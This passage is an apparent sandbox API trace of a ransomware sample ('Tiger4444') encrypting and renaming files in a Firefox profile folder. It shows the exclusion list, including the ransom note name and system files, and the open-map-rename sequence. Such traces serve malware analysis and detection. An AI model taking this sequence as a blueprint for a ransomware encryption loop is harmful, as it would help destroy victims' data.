(lpString1="sessionstore-backups", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2="Tiger4444.exe") returned -1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2=".") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2="..") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2="windows") returned -1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2="bootmgr") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2="pagefile.sys") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2="boot") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2="ids.txt") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore-backups", lpString2="NTUSER.DAT") returned 1 [0051.164] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="sessionstore-backups" | out: lpString1="sessionstore-backups") returned="sessionstore-backups" [0051.164] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc5a720 [0051.164] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xbe) returned 0xc612d8 [0051.164] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc5a728 | out: ListHead=0xc66828, ListEntry=0xc5a728) returned 0xc66368 [0051.164] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e7fd9e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb7e7fd9e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb7e7fd9e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1433, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sessionstore.js", cAlternateFileName="SESSIO~1.JS")) returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore.js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore.js", lpString2="Tiger4444.exe") returned -1 [0051.164] lstrcmpiW (lpString1="sessionstore.js", lpString2=".") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore.js", lpString2="..") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore.js", lpString2="windows") returned -1 [0051.164] lstrcmpiW (lpString1="sessionstore.js", lpString2="bootmgr") returned 1 [0051.164] lstrcmpiW (lpString1="sessionstore.js", lpString2="pagefile.sys") returned 1 [0051.165] lstrcmpiW (lpString1="sessionstore.js", lpString2="boot") returned 1 [0051.165] lstrcmpiW (lpString1="sessionstore.js", lpString2="ids.txt") returned 1 [0051.165] lstrcmpiW (lpString1="sessionstore.js", lpString2="NTUSER.DAT") returned 1 [0051.165] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="sessionstore.js" | out: lpString1="sessionstore.js") returned="sessionstore.js" [0051.165] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js", dwFileAttributes=0x0) returned 1 [0051.165] lstrlenW (lpString="sessionstore.js") returned 15 [0051.165] lstrlenW (lpString="Tiger4444") returned 9 [0051.165] lstrcmpiW (lpString1="nstore.js", lpString2="Tiger4444") returned -1 [0051.165] lstrlenW (lpString=".dll") returned 4 [0051.165] lstrcmpiW (lpString1="e.js", lpString2=".dll") returned 1 [0051.165] lstrlenW (lpString=".lnk") returned 4 [0051.165] lstrcmpiW (lpString1="e.js", lpString2=".lnk") returned 1 [0051.165] lstrlenW (lpString=".ini") returned 4 [0051.165] lstrcmpiW (lpString1="e.js", lpString2=".ini") returned 1 [0051.165] lstrlenW (lpString=".sys") returned 4 [0051.165] lstrcmpiW (lpString1="e.js", lpString2=".sys") returned 1 [0051.165] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.165] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.165] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14261838516) returned 1 [0051.165] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=5171) returned 1 [0051.165] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0051.165] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0051.165] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1740, lpName=0x0) returned 0x2c8 [0051.167] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1740) returned 0xbe0000 [0051.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0051.190] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0051.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.191] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0051.191] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.191] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0051.191] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14264384668) returned 1 [0051.191] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0051.191] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0051.191] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.191] CloseHandle (hObject=0x2c8) returned 1 [0051.191] CloseHandle (hObject=0x260) returned 1 [0051.191] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js.Tiger4444") returned 99 [0051.191] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore.js"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore.js.tiger4444"), dwFlags=0x1) returned 1 [0051.192] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143f0f49, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x143f0f49, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SiteSecurityServiceState.txt", cAlternateFileName="SITESE~1.TXT")) returned 1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="Tiger4444.exe") returned -1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2=".") returned 1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="..") returned 1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="windows") returned -1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="bootmgr") returned 1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="pagefile.sys") returned 1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="boot") returned 1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="ids.txt") returned 1 [0051.192] lstrcmpiW (lpString1="SiteSecurityServiceState.txt", lpString2="NTUSER.DAT") returned 1 [0051.192] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="SiteSecurityServiceState.txt" | out: lpString1="SiteSecurityServiceState.txt") returned="SiteSecurityServiceState.txt" [0051.192] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt", dwFileAttributes=0x0) returned 1 [0051.193] lstrlenW (lpString="SiteSecurityServiceState.txt") returned 28 [0051.193] lstrlenW (lpString="Tiger4444") returned 9 [0051.193] lstrcmpiW (lpString1="State.txt", lpString2="Tiger4444") returned -1 [0051.193] lstrlenW (lpString=".dll") returned 4 [0051.193] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0051.193] lstrlenW (lpString=".lnk") returned 4 [0051.193] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0051.193] lstrlenW (lpString=".ini") returned 4 [0051.193] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0051.193] lstrlenW (lpString=".sys") returned 4 [0051.193] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0051.193] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sitesecurityservicestate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.193] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.193] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14264654040) returned 1 [0051.193] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1822) returned 1 [0051.194] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0051.194] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0051.194] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa20, lpName=0x0) returned 0x2c8 [0051.195] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa20) returned 0xbe0000 [0051.204] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.204] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0051.204] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.204] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0051.204] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.205] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0051.205] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.205] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0051.205] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14265790344) returned 1 [0051.205] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0051.205] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0051.205] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.205] CloseHandle (hObject=0x2c8) returned 1 [0051.205] CloseHandle (hObject=0x260) returned 1 [0051.205] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt.Tiger4444") returned 112 [0051.205] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sitesecurityservicestate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SiteSecurityServiceState.txt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sitesecurityservicestate.txt.tiger4444"), dwFlags=0x1) returned 1 [0051.206] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c1abf, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c1abf, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x23c2e4c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="storage", cAlternateFileName="")) returned 1 [0051.206] lstrcmpiW (lpString1="storage", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.206] lstrcmpiW (lpString1="storage", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.206] lstrcmpiW (lpString1="storage", lpString2="Tiger4444.exe") returned -1 [0051.206] lstrcmpiW (lpString1="storage", lpString2=".") returned 1 [0051.206] lstrcmpiW (lpString1="storage", lpString2="..") returned 1 [0051.206] lstrcmpiW (lpString1="storage", lpString2="windows") returned -1 [0051.206] lstrcmpiW (lpString1="storage", lpString2="bootmgr") returned 1 [0051.206] lstrcmpiW (lpString1="storage", lpString2="pagefile.sys") returned 1 [0051.206] lstrcmpiW (lpString1="storage", lpString2="boot") returned 1 [0051.206] lstrcmpiW (lpString1="storage", lpString2="ids.txt") returned 1 [0051.206] lstrcmpiW (lpString1="storage", lpString2="NTUSER.DAT") returned 1 [0051.206] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="storage" | out: lpString1="storage") returned="storage" [0051.207] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc86a60 [0051.207] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xa4) returned 0xc87fa8 [0051.207] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc86a68 | out: ListHead=0xc66828, ListEntry=0xc86a68) returned 0xc5a728 [0051.207] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f76d02, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x1f76d02, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x22b9f22, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="storage.sqlite", cAlternateFileName="STORAG~1.SQL")) returned 1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2="Tiger4444.exe") returned -1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2=".") returned 1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2="..") returned 1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2="windows") returned -1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2="bootmgr") returned 1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2="pagefile.sys") returned 1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2="boot") returned 1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2="ids.txt") returned 1 [0051.207] lstrcmpiW (lpString1="storage.sqlite", lpString2="NTUSER.DAT") returned 1 [0051.207] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="storage.sqlite" | out: lpString1="storage.sqlite") returned="storage.sqlite" [0051.207] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite", dwFileAttributes=0x0) returned 1 [0051.207] lstrlenW (lpString="storage.sqlite") returned 14 [0051.207] lstrlenW (lpString="Tiger4444") returned 9 [0051.207] lstrcmpiW (lpString1="ge.sqlite", lpString2="Tiger4444") returned -1 [0051.207] lstrlenW (lpString=".dll") returned 4 [0051.208] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0051.208] lstrlenW (lpString=".lnk") returned 4 [0051.208] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0051.208] lstrlenW (lpString=".ini") returned 4 [0051.208] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0051.208] lstrlenW (lpString=".sys") returned 4 [0051.208] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0051.208] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.208] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.208] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14266118841) returned 1 [0051.208] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=512) returned 1 [0051.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0051.208] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0051.208] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500, lpName=0x0) returned 0x2c8 [0051.212] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x500) returned 0xbe0000 [0051.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0051.213] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0051.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.213] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0051.213] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.213] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0051.213] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14266660129) returned 1 [0051.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0051.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0051.214] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.214] CloseHandle (hObject=0x2c8) returned 1 [0051.214] CloseHandle (hObject=0x260) returned 1 [0051.214] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite.Tiger4444") returned 98 [0051.214] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage.sqlite.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage.sqlite.tiger4444"), dwFlags=0x1) returned 1 [0051.215] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="times.json", cAlternateFileName="TIMES~1.JSO")) returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2="Tiger4444.exe") returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2=".") returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2="..") returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2="windows") returned -1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2="bootmgr") returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2="pagefile.sys") returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2="boot") returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2="ids.txt") returned 1 [0051.215] lstrcmpiW (lpString1="times.json", lpString2="NTUSER.DAT") returned 1 [0051.215] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="times.json" | out: lpString1="times.json") returned="times.json" [0051.215] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json", dwFileAttributes=0x0) returned 1 [0051.215] lstrlenW (lpString="times.json") returned 10 [0051.215] lstrlenW (lpString="Tiger4444") returned 9 [0051.215] lstrcmpiW (lpString1="imes.json", lpString2="Tiger4444") returned -1 [0051.215] lstrlenW (lpString=".dll") returned 4 [0051.215] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0051.215] lstrlenW (lpString=".lnk") returned 4 [0051.215] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0051.215] lstrlenW (lpString=".ini") returned 4 [0051.215] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0051.216] lstrlenW (lpString=".sys") returned 4 [0051.216] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0051.216] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\times.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.216] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.216] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14266892401) returned 1 [0051.216] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=29) returned 1 [0051.216] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0051.216] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0051.216] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x2c8 [0051.219] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0xbe0000 [0051.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0051.220] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0051.220] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0051.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0051.221] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14267374565) returned 1 [0051.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0051.221] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0051.221] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.221] CloseHandle (hObject=0x2c8) returned 1 [0051.221] CloseHandle (hObject=0x260) returned 1 [0051.221] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json.Tiger4444") returned 94 [0051.221] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json" (normalized: 